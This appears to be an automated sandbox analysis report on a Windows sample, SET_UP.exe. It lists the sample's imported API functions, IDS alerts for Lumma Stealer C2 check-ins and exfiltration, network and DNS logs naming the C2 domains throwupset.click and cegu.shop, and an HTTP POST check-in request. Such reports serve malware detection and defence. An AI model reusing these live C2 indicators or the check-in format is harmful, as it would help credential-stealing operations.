CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                          msimg32.dllAlphaBlend
                                                                                                          gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
                                                                                                          version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                          mpr.dllWNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
                                                                                                          kernel32.dlllstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
                                                                                                          advapi32.dllSetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                                                                                                          comctl32.dllInitCommonControls
                                                                                                          kernel32.dllSleep
                                                                                                          oleaut32.dllGetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                          comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                          shell32.dllShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                                                                                                          shell32.dllSHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                                                                                                          comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                          ole32.dllCoDisconnectObject
                                                                                                          advapi32.dllAdjustTokenPrivileges
                                                                                                          oleaut32.dllSysFreeString
                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-01T17:20:14.655175+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:15.222766+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449736104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:15.222766+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:15.692056+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:16.176982+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449737104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:16.176982+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:16.820091+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:18.115018+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:19.557334+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:21.017913+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:21.457529+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449742104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:22.028591+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:22.974708+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:23.706583+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744104.21.112.1443TCP
                                                                                                          2025-01-01T17:20:24.357688+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745185.161.251.21443TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 1, 2025 17:20:14.188909054 CET49736443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:14.188952923 CET44349736104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:14.189033031 CET49736443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:14.192478895 CET49736443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:14.192493916 CET44349736104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:14.655062914 CET44349736104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:14.655174971 CET49736443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:14.658193111 CET49736443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:14.658217907 CET44349736104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:14.658610106 CET44349736104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:14.708416939 CET49736443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:14.783540010 CET49736443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:14.783572912 CET49736443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:14.783704996 CET44349736104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:15.222785950 CET44349736104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:15.222873926 CET44349736104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:15.222929955 CET49736443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:15.224924088 CET49736443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:15.224937916 CET44349736104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:15.230858088 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:15.230891943 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:15.230978012 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:15.231230021 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:15.231241941 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:15.691917896 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:15.692055941 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:15.693418026 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:15.693428993 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:15.693677902 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:15.694854975 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:15.694884062 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:15.694935083 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.176990986 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.177066088 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.177093029 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.177114010 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.177123070 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.177133083 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.177161932 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.177228928 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.177265882 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.177268982 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.177283049 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.177324057 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.177622080 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.181713104 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.181745052 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.181773901 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.181778908 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.181786060 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.181829929 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.181859970 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.181905985 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.181998968 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.182014942 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.182027102 CET49737443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.182032108 CET44349737104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.333714962 CET49738443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.333746910 CET44349738104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.333816051 CET49738443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.334192991 CET49738443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.334203005 CET44349738104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.819984913 CET44349738104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.820091009 CET49738443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.822510004 CET49738443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.822516918 CET44349738104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.822746038 CET44349738104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.825949907 CET49738443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.826137066 CET49738443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.826155901 CET44349738104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:16.826222897 CET49738443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:16.826226950 CET44349738104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:17.571156979 CET44349738104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:17.571245909 CET44349738104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:17.571297884 CET49738443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:17.571547985 CET49738443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:17.571567059 CET44349738104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:17.653057098 CET49739443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:17.653089046 CET44349739104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:17.653162956 CET49739443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:17.653438091 CET49739443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:17.653450966 CET44349739104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:18.114923000 CET44349739104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:18.115017891 CET49739443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:18.116365910 CET49739443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:18.116377115 CET44349739104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:18.116633892 CET44349739104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:18.117866039 CET49739443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:18.117971897 CET49739443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:18.118002892 CET44349739104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:18.867038965 CET44349739104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:18.867131948 CET44349739104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:18.867254972 CET49739443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:18.867453098 CET49739443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:18.867471933 CET44349739104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:19.079268932 CET49740443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:19.079308987 CET44349740104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:19.079366922 CET49740443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:19.079741001 CET49740443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:19.079752922 CET44349740104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:19.557230949 CET44349740104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:19.557333946 CET49740443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:19.559362888 CET49740443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:19.559367895 CET44349740104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:19.559602976 CET44349740104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:19.560821056 CET49740443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:19.561156988 CET49740443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:19.561193943 CET44349740104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:19.561258078 CET49740443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:19.561266899 CET44349740104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:20.191221952 CET44349740104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:20.191325903 CET44349740104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:20.191380024 CET49740443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:20.191457033 CET49740443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:20.191472054 CET44349740104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:20.561172962 CET49742443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:20.561212063 CET44349742104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:20.561283112 CET49742443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:20.561914921 CET49742443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:20.561927080 CET44349742104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:21.017846107 CET44349742104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:21.017913103 CET49742443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:21.019162893 CET49742443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:21.019175053 CET44349742104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:21.019408941 CET44349742104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:21.020670891 CET49742443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:21.020771980 CET49742443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:21.020777941 CET44349742104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:21.457557917 CET44349742104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:21.457655907 CET44349742104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:21.457811117 CET49742443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:21.457930088 CET49742443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:21.457951069 CET44349742104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:21.551163912 CET49743443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:21.551194906 CET44349743104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:21.551345110 CET49743443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:21.552030087 CET49743443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:21.552042961 CET44349743104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.028501987 CET44349743104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.028590918 CET49743443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.029947996 CET49743443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.029956102 CET44349743104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.030272007 CET44349743104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.031518936 CET49743443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.031634092 CET49743443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.031640053 CET44349743104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.507705927 CET44349743104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.507802010 CET44349743104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.507843018 CET49743443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.508073092 CET49743443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.508095026 CET44349743104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.510620117 CET49744443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.510654926 CET44349744104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.510731936 CET49744443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.511198997 CET49744443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.511212111 CET44349744104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.974632025 CET44349744104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.974708080 CET49744443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.989671946 CET49744443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.989691019 CET44349744104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.989948034 CET44349744104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:22.991075993 CET49744443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.991128922 CET49744443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:22.991149902 CET44349744104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:23.706598997 CET44349744104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:23.706701040 CET44349744104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:23.706785917 CET49744443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:23.707022905 CET49744443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:23.707045078 CET44349744104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:23.707056999 CET49744443192.168.2.4104.21.112.1
                                                                                                          Jan 1, 2025 17:20:23.707065105 CET44349744104.21.112.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:23.718462944 CET49745443192.168.2.4185.161.251.21
                                                                                                          Jan 1, 2025 17:20:23.718501091 CET44349745185.161.251.21192.168.2.4
                                                                                                          Jan 1, 2025 17:20:23.718559980 CET49745443192.168.2.4185.161.251.21
                                                                                                          Jan 1, 2025 17:20:23.718874931 CET49745443192.168.2.4185.161.251.21
                                                                                                          Jan 1, 2025 17:20:23.718889952 CET44349745185.161.251.21192.168.2.4
                                                                                                          Jan 1, 2025 17:20:24.357604027 CET44349745185.161.251.21192.168.2.4
                                                                                                          Jan 1, 2025 17:20:24.357687950 CET49745443192.168.2.4185.161.251.21
                                                                                                          Jan 1, 2025 17:20:24.359329939 CET49745443192.168.2.4185.161.251.21
                                                                                                          Jan 1, 2025 17:20:24.359338045 CET44349745185.161.251.21192.168.2.4
                                                                                                          Jan 1, 2025 17:20:24.359582901 CET44349745185.161.251.21192.168.2.4
                                                                                                          Jan 1, 2025 17:20:24.360816956 CET49745443192.168.2.4185.161.251.21
                                                                                                          Jan 1, 2025 17:20:24.407325983 CET44349745185.161.251.21192.168.2.4
                                                                                                          Jan 1, 2025 17:20:24.622318029 CET44349745185.161.251.21192.168.2.4
                                                                                                          Jan 1, 2025 17:20:24.622385025 CET44349745185.161.251.21192.168.2.4
                                                                                                          Jan 1, 2025 17:20:24.622467995 CET49745443192.168.2.4185.161.251.21
                                                                                                          Jan 1, 2025 17:20:24.622607946 CET49745443192.168.2.4185.161.251.21
                                                                                                          Jan 1, 2025 17:20:24.622629881 CET44349745185.161.251.21192.168.2.4
                                                                                                          Jan 1, 2025 17:20:24.622642040 CET49745443192.168.2.4185.161.251.21
                                                                                                          Jan 1, 2025 17:20:24.622647047 CET44349745185.161.251.21192.168.2.4
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 1, 2025 17:20:14.159308910 CET4916153192.168.2.41.1.1.1
                                                                                                          Jan 1, 2025 17:20:14.181783915 CET53491611.1.1.1192.168.2.4
                                                                                                          Jan 1, 2025 17:20:23.708693981 CET6123953192.168.2.41.1.1.1
                                                                                                          Jan 1, 2025 17:20:23.716438055 CET53612391.1.1.1192.168.2.4
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 1, 2025 17:20:14.159308910 CET192.168.2.41.1.1.10x92e1Standard query (0)throwupset.clickA (IP address)IN (0x0001)false
                                                                                                          Jan 1, 2025 17:20:23.708693981 CET192.168.2.41.1.1.10xa7d1Standard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 1, 2025 17:20:14.181783915 CET1.1.1.1192.168.2.40x92e1No error (0)throwupset.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                                          Jan 1, 2025 17:20:14.181783915 CET1.1.1.1192.168.2.40x92e1No error (0)throwupset.click104.21.64.1A (IP address)IN (0x0001)false
                                                                                                          Jan 1, 2025 17:20:14.181783915 CET1.1.1.1192.168.2.40x92e1No error (0)throwupset.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                                          Jan 1, 2025 17:20:14.181783915 CET1.1.1.1192.168.2.40x92e1No error (0)throwupset.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                                          Jan 1, 2025 17:20:14.181783915 CET1.1.1.1192.168.2.40x92e1No error (0)throwupset.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                                          Jan 1, 2025 17:20:14.181783915 CET1.1.1.1192.168.2.40x92e1No error (0)throwupset.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                                          Jan 1, 2025 17:20:14.181783915 CET1.1.1.1192.168.2.40x92e1No error (0)throwupset.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                                          Jan 1, 2025 17:20:23.716438055 CET1.1.1.1192.168.2.40xa7d1No error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                          • throwupset.click
                                                                                                          • cegu.shop
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449736104.21.112.14431104C:\Users\user\Desktop\SET_UP.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-01 16:20:14 UTC263OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 8
                                                                                                          Host: throwupset.click
                                                                                                          2025-01-01 16:20:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                          Data Ascii: act=life
                                                                                                          2025-01-01 16:20:15 UTC1125INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 01 Jan 2025 16:20:15 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=th2ks0pmp4qcncdk2ec0e5tkk8; expires=Sun, 27 Apr 2025 10:06:54 GMT; Max-Age=9999999; path=/
